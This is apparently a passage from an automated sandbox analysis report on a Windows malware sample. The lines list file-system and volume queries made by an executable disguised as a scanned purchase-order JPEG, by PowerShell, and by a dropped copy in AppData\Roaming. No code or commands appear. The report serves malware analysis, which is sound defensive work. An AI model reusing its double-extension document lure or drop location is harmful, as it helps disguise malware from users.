                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
